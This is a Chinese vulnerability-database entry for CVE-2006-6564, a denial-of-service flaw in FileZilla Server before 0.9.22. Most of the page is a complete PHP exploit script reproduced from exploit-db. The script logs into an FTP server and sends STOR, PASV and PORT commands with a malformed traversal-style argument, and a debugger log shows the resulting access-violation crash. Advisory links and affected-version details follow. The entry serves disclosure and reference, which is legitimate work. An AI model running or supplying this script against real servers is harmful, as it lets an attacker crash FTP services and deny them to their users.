FileZilla Server STOR命令畸形自变量拒绝服务攻击漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1111749 漏洞类型 未知
发布时间 2006-12-09 更新时间 2006-12-15
CVE编号 CVE-2006-6564 CNNVD-ID CNNVD-200612-345
漏洞平台 Windows CVSS评分 4.0
|漏洞来源
https://www.exploit-db.com/exploits/2901
https://www.securityfocus.com/bid/87275
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200612-345
|漏洞详情
FileZillaServer的0.9.22之前版本远程攻击者通过传给STOR命令的畸形自变量(可造成空指针解引用)来发起拒绝服务攻击(崩溃)。
|漏洞EXP
<?php

# Filezilla FTP Server 0.9.20 beta / 0.9.21 "STOR" Denial Of Service
# by rgod
# mail: retrog at alice dot it
# site: http://retrogod.altervista.org

# tested on WinXP sp2

error_reporting(E_ALL);

$service_port = getservbyname('ftp', 'tcp');
$address = gethostbyname('192.168.1.3');

$user="test";
$pass="test";

$junk.="../../../sun-tzu/../../../sun-tzu/../../../sun-tzu";

$socket = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
if ($socket < 0) {
   echo "socket_create() failed:\n reason: " . socket_strerror($socket) . "\n";
} else {
   echo "OK.\n";
}

$result = socket_connect($socket, $address, $service_port);
if ($result < 0) {
   echo "socket_connect() failed:\n reason: ($result) " . socket_strerror($result) . "\n";
} else {
   echo "OK.\n";
}

$out=socket_read($socket, 240);
echo $out;

$in = "USER ".$user."\r\n";
socket_write($socket, $in, strlen ($in));

$out=socket_read($socket, 80);
echo $out;

$in = "PASS ".$pass."\r\n";
socket_write($socket, $in, strlen ($in));

$out=socket_read($socket, 80);
echo $out;

$in = "PASV ".$junk."\r\n";
socket_write($socket, $in, strlen ($in));

$in = "PORT ".$junk."\r\n";
socket_write($socket, $in, strlen ($in));

$in = "STOR ".$junk."\r\n";
socket_write($socket, $in, strlen ($in));

socket_close($socket);

/*
07:04:28.270  pid=0F84 tid=03A0  EXCEPTION (first-chance)
              ----------------------------------------------------------------
              Exception C0000005 (ACCESS_VIOLATION writing [0000007C])
              ----------------------------------------------------------------
              EAX=00000000: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
              EBX=00476540: 0A 00 00 00 43 00 44 00-55 00 50 00 00 00 00 00
              ECX=00000000: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
              EDX=00D7E2F4: 00 00 00 00 A8 56 37 00-00 00 00 00 00 00 00 00
              ESP=00D7E2C8: 00 00 00 00 F0 6E 37 00-2F 93 41 00 F4 E2 D7 00
              EBP=0000000C: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
              ESI=00000000: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
              EDI=00000060: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
              EIP=00449427: C6 46 7C 01 8B 4F 18 B8-08 00 00 00 3B C8 72 05
                            --> MOV BYTE PTR [ESI+7C],01
              ----------------------------------------------------------------

07:04:28.330  pid=0F84 tid=03A0  EXCEPTION (unhandled)
              ----------------------------------------------------------------
              Exception C0000005 (ACCESS_VIOLATION writing [0000007C])
              ----------------------------------------------------------------
              EAX=00000000: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
              EBX=00476540: 0A 00 00 00 43 00 44 00-55 00 50 00 00 00 00 00
              ECX=00000000: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
              EDX=00D7E2F4: 00 00 00 00 A8 56 37 00-00 00 00 00 00 00 00 00
              ESP=00D7E2C8: 00 00 00 00 F0 6E 37 00-2F 93 41 00 F4 E2 D7 00
              EBP=0000000C: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
              ESI=00000000: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
              EDI=00000060: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
              EIP=00449427: C6 46 7C 01 8B 4F 18 B8-08 00 00 00 3B C8 72 05
                            --> MOV BYTE PTR [ESI+7C],01
              ----------------------------------------------------------------

07:04:28.330  pid=0F84 tid=0104  Thread exited with code 3221225477
07:04:28.380  pid=0F84 tid=0F18  Thread exited with code 3221225477
07:04:28.380  pid=0F84 tid=03A0  Thread exited with code 3221225477
07:04:28.380  pid=0F84 tid=04E4  Thread exited with code 3221225477
07:04:28.390  pid=0F84 tid=053C  Thread exited with code 3221225477
07:04:28.390  pid=0F84 tid=0780  Process exited with code 3221225477

*/

?>

# milw0rm.com [2006-12-09]
|受影响的产品
FileZilla FileZilla 0.9.21
|参考资料

来源:VUPEN
名称:ADV-2006-4937
链接:http://www.frsirt.com/english/advisories/2006/4937
来源:XF
名称:filezilla-commands-dos(30853)
链接:http://xforce.iss.net/xforce/xfdb/30853
来源:sourceforge.net
链接:http://sourceforge.net/project/shownotes.php?release_id=470364&group_id=21558
来源:MISC
链接:http://retrogod.altervista.org/filezilla_0921_dos.html